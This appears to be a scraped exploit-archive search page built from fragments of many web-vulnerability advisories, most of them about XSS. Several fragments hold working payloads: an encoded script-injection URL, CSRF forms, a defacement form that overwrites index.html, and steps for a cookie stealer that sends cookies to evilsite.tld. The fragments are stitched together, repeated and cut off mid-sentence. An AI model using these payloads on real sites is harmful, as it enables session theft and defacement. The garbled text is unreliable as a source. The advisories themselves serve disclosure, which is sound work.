Next Page >>
html code
---[ Vulnerability description ]
Positive Research Center has discovered multiple XSS vulnerabilties in Kayako Support Suite.
Application insufficiently verifies subscriberdata incoming parameter in /staff/index.php?_m=news&_a=importexport script.
An attacker with "staff" privileges can use the vulnerabilty to inject and execute arbitrary HTML code and scripts in a user's browser within the trust relationship between the browser and the server.
To use the vulnerability an attacker should convince a user with "staff" privileges to open URL like:
http://example.com/support/staff/index.php?_m=news&_a=managesubscribers&importsub=1&resultdata=YTo0OntzOjEzOiJzdWNjZXNzZW1haWxzIjtpOjA7czoxMjoiZmFpbGVkZW1haWxzIjtpOjE7czoxMToidG90YWxlbWFpbHMiO2k6MTtzOjk6ImVtYWlsbGlzdCI7czo5MDoiPHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD5APHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4uPHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4gIjt9
Application insufficiently verifies subject incoming parameter in /staff/index.php?_m=news&_a=insertnews script.
An attacker with "staff" privileges can use the vulnerabilty to inject and execute arbitrary HTML code and scripts in a user's browser within the trust relationship between the browser and the server.
An attacker should trick a user with "staff" privileges to open URL like:
server will be the one in charge of processing these requests to create
the 'index.dat.english.pl' file which will be used later to redirect the
victim's browser to the locally stored index.dat file.
However, the main objective of this page is to set (when redirecting to
the next page) HTML code inside the victim's history index.dat file. The
HTML source code to accomplish such tasks would look very much like the
following:
/-----------
I. Description
The Palm Pre WebOS version 1.0.4 and below allows a remote attacker to execute arbitrary HTML code on the phone via certain applications. The affected applications involve the native email client via the notifications system as well as the native calendar application.
The vendor has been contacted and a patch has been released:
WebOS 1.1 - http://kb.palm.com/wps/portal/kb/na/pre/p100eww/sprint/solutions/article/50607_en.html#11
II. Impact
---[ Vulnerability description ]
Positive Research Center has discovered XSS in Kayako Support Suite.
Application insufficiently verifies incoming data in "Subject" parameter in LiveSupport module.
An attacker can use the vulnerability to inject and execute HTML code and scripts in a user's browser within the trust relationship between the browser and the server.
An attack can be successful if administrator deletes a message created by user via Delete button of Options section of the message.
Application insufficiently verifies incoming data in "Full Name" and "Subject" parameters in Tickets module.
An attacker can use the vulnerability to inject and execute HTML code and scripts in a user's browser within the trust relationship between the browser and the server.
An attack can be successful if administrator views task information via popup menu.
CVE-2008-4182
It was discovered that imp4 suffers from a cross-site scripting (XSS)
attack via the user field in an IMAP session, which allows attackers to
inject arbitrary HTML code.
CVE-2009-0930
It was discovered that imp4 is prone to several cross-site scripting
(XSS) attacks via several vectors in the mail code allowing attackers
##Explanation(Deutsch/German)##:
In vBulletin 3.6.8 gibt es eine XSRF Lcke, die dazu benutzt werden kann, um
XSS Code auszufhren. Admins knnen in ihren eigenen Benutzerrang HTML Code
verwenden. Das kann ein Angreifer ausnutzen um beliebigen html/javascript
code auszufhren, wenn er den oben stehenden code in eine Seite packt und
dann dem Admin eine Private Nachricht sendet, mit einem Link zu einer Seite
mit dem obigen HTML-Code. Somit ist es dem Angreifer mglich, alle Cookies
von den Benutzern zu klauen, die gerade einen Thread lesen,in welchem ein
applications.
When the application's view state is not encrypted, it is
possible for an attacker to supply a new or modified view
object as part of a request. The malicious view can contain
arbitrary HTML code (allowing Cross-Site Scripting), and
arbitrary Expression Language (EL) [11] statements that will
be executed on the server. The EL statements can be used to
read data stored in user-scoped session variables, and
application or server-scoped variables. Since these
variables should be inaccessible by the user, it is not
applications.
When the application's view state is not encrypted, it is
possible for an attacker to supply a new or modified view
object as part of a request. The malicious view can contain
arbitrary HTML code (allowing Cross-Site Scripting), and
arbitrary Expression Language (EL) [11] statements that will
be executed on the server. The EL statements can be used to
read data stored in user-scoped session variables, and
application or server-scoped variables. Since these
variables should be inaccessible by the user, it is not
applications.
When the application's view state is not encrypted, it is
possible for an attacker to supply a new or modified view
object as part of a request. The malicious view can contain
arbitrary HTML code (allowing Cross-Site Scripting), and
arbitrary Expression Language (EL) [11] statements that will
be executed on the server. The EL statements can be used to
read data stored in user-scoped session variables, and
application or server-scoped variables. Since these
variables should be inaccessible by the user, it is not
applications.
When the application's view state is not encrypted, it is
possible for an attacker to supply a new or modified view
object as part of a request. The malicious view can contain
arbitrary HTML code (allowing Cross-Site Scripting), and
arbitrary Expression Language (EL) [11] statements that will
be executed on the server. The EL statements can be used to
read data stored in user-scoped session variables, and
application or server-scoped variables. Since these
variables should be inaccessible by the user, it is not
IMPACT: Stored XSS , XSRF , Defacing , etc...
------------------------------------------------------
---Remote XSS Exploit [add comment section]---
Vulnerable in "add comment" section. That's can input HTML code Injection into comment box then send to server.
URL : http://[TARGET]/[webalbum_PATH]/photo_add-c.php
POST Variable: comment --> XSS Vulnerabilities
POST Variable: id
POST Variable: category
Further research on BladeCenter AMM is strongly encouraged as
this brief overview touched only the surface of the device.
Management module supports a variety of networking protocols
and contains features also from Telco version. These can be
found by reading the commented HTML-code. One example feature is
http://1.2.3.4/private/get_telco_system_health_summary
It is also apparent that session timeout is not enforced.
More information:
10. *References*
[1]
http://www.sun.com/software/products/calendar_srvr/comms_express/index.xml
[2] HTML Code Injection and Cross-Site Scripting
http://www.technicalinfo.net/papers/CSS.html.
[3] The Cross-Site Scripting FAQ (XSS)
http://www.cgisecurity.com/articles/xss-faq.shtml
[4] How to prevent Cross-Site Scripting Security Issues
http://support.microsoft.com/default.aspx?scid=KB;en-us;q252985
An attacker can use browser to exploit this vulnerability. The following PoC is available:
<form action="http://host/" method="post" name="main" >
<input type="hidden" name="text" value='php and html code of template<script>alert(document.cookie)</script>' />
<input type="hidden" name="file" value="template" />
<input type="hidden" name="action" value="save" />
</form>
<script>
What's the best way to exploit the vulnerability?
1) Make a file named: .j (and upload to a domain which has a name equal to or shorter than 8 characters)
2) The file should contain the following:
HTML Code:
document.location='http://evilsite.tld/cookielogger.php?cookie=' + document.cookie;
3) Sign up and make you first name: (try aff_signup.php to avoid paying!)
"><script src="//evilsite.tld/.j
Google Docs (HTML code) Multiple Cross Site Scripting Vulnerabilities
I. Background:
Google Docs is an online application which makes possibile to "Create and share your work online". You can use it to
create Documents, Presentations, Spreadsheets and Forms.
II. Description:
Multiple cross site scripting vulnerabilities were identified in Google Docs. A remote attacker could write a malformed
document and invite, through Google Docs sharing option, other users to see it in order to obtain their cookies. It's also possible
C) Reflected XSS
________________
The afmsg parameter is not properly sanitised before
being printed.This allows the execution of arbitrary HTML
code.
IV. SAMPLE CODE
_______________
INSERT sql query.
Explanation:
===============
Let's try this little piece of html code as proof-of-concept:
[--------------- PoC start -------------------------------------------------]
<html><body><center>
<form action="http://localhost/mybb.1.2.11/private.php" method="post">
<input type="hidden" name="action" value="do_send">
Exposures project identifies the following problems:
Several cross-site scripting issues via several parameters were
discovered in the CGI scripts, allowing attackers to inject arbitrary
HTML code. In order to cover the different attack vectors, these issues
have been assigned CVE-2007-5624, CVE-2007-5803 and CVE-2008-1360.
For the oldstable distribution (etch), these problems have been fixed in
version 2.6-2+etch4.
PORT STATE SERVICE
23/tcp open telnet
80/tcp open http
Port 80 gives access through an HTML interface to the configuration menu as would be expected, but although you can control access to that interface using a password, there is no control over the telnet port. So, telnetting to port 23 (on is default IP 192.168.0.1) the users get automatically access to the filesystem, by providing no credentials at all. Now the file system of the device may be used for malicious communication and temporary data storage. Too, a user may download the upgrade firware's HTML code from the www directory and modify it locally so allow other files than IMGs to be uploaded and replace the existing firmware, making the device useless.
Also, one can view the contents of /etc/htpasswd file, where everything is in plaintext, and retrieve the web-based administrator's (admin) password. Some of the possible implications, that can be triggered from the web-interface, but not limited to the following, are:
1. Intruders are now capable to open the configuration page and go through the submenus where they can get the wireless key in use (the wireless key is being displayed in plaintext, as well)
2. They can perform a trivial DoS attack (factory restart the modem and everything stops working) similarly from the telnet session, by issuing the command "reboot" the device will obey and it will restart itself
<!-- This code will rewrite or make "index.html" in http://[target]/[pblang_path] -->
<form action='[target]/ntopic.php?idnum=[idtopic]' name='postmodify' enctype='multipart/form-data' method='POST' onSubmit='submitonce(this);'target='_self'>
<input type='text' name='subject' value='Owned by KiNgOfThEwOrLd's Exploit'>
<input type='hidden' name='fid' value='../../../../index.html\0'>
<input type='hidden' name='cat' value='2' size=40>
<input type='radio' name='topicicon' value='"; [YOUR HTML CODE]' CHECKED>
<textarea name='message' rows='12' cols='60' onselect='storeCaret(this)' onclick='storeCaret(this)' onkeyup='storeCaret(this)'>VISIT Http://www.inj3ct-it.org</textarea>
<input type='hidden' name='gueststatus' value=''>
<input type='checkbox' name='EMNotify'>
<input type='submit' name='Submit' value='Own!'>
</form>
Discovered by: Aliaksandr Hartsuyeu ( http://evuln.com/ )
--------Description--------
It is possible to inject xss code into "post" parameter in
"views/Post/edit/form.php" script.
Parameter "post" is not properly sanitized before being used in HTML
code.
Condition: register_globals: on
--------PoC/Exploit--------
PoC code is available at:
http://evuln.com/vulns/161/exploit.html
---------Solution----------
PoC: Available
Solution: Not available
Discovered by: Aliaksandr Hartsuyeu ( http://evuln.com/ )
--------Description--------
It is possible to inject xss code into view parameter in showflat.pl script.
Parameter view is not sanitized before being used in HTML code
--------PoC/Exploit--------
PoC code is available at:
http://evuln.com/vulns/157/exploit.html
---------Solution----------
Not available
o The chart tool tip text.
o The href attribute for a chart area.
o The shape attribute for a chart area.
o The coords attribute for a chart area.
It is possible to inject custom HTML code into the code generated by
the JFreeChart library. If a web server uses this library to generate
charts from user-supplied data, an attacker could cause other users of
the same website or application to execute arbitrary JavaScript code
when viewing a page containing a chart.
option needs to be activated:
'http://victim/vBulletin/profile.php?do=editoptions' (Show New Private
Message Notification Pop-Up enabled). There are many forums with this
option enabled by default for all new users.
The title is not being encoded in the following rendered HTML code:
/-----------
<!--
// script to show new private message popup
opac-downloadshelf.pl
opac-review.pl
opac-sendshelf.pl
opac-serial-issues.pl
An attacker can use the vulnerabilty to inject and execute arbitrary HTML code and scripts in a user's browser within the trust relationship between the browser and the server.
---[ How to fix ]
Update your software up to the latest version.
8. *Technical Description / Proof of Concept Code*
This vulerablity is triggered because the 'mode' parameter on the
'media-rss.php' script is not correctly escaped to avoid HTML code
injection.
/-----
$mode = $_GET["mode"];
- -----/
PoC: Not available
Solution: Not available
Discovered by: Aliaksandr Hartsuyeu ( http://evuln.com/ )
--------Description--------
It is possible to inject xss code into title parameter in views/Thread/display/top.php script.
Parameter title is not properly sanitized before being used in HTML code.
Condition: register_globals: on
--------PoC/Exploit--------
PoC code is available at:
http://evuln.com/vulns/159/exploit.html
[8] included a patch to fix the bug reported in CORE-2008-0826. The fix
was implemented as a modification to the MIME-type detection method when
loading content specified in an 'OBJECT' tag. Thus, the contents of the
index.dat file will not be rendered and shown to an Internet Explorer
user if it is directly referenced from a webpage with the following HTML
code:
/-----
<object data="file://127.0.0.1/C$/.../index.dat"
type="text/html"
width="100%" height="50"
Solution: Not available
Discovered by: Aliaksandr Hartsuyeu ( http://evuln.com/ )
--------Description--------
It is possible to inject xss code into "title" and "url" parameters in save.php script.
Parameters "title", "url" are not properly sanitized before being used in HTML code.
--------PoC/Exploit--------
PoC code is available at:
http://evuln.com/vulns/164/exploit.html
Next Page>>
|
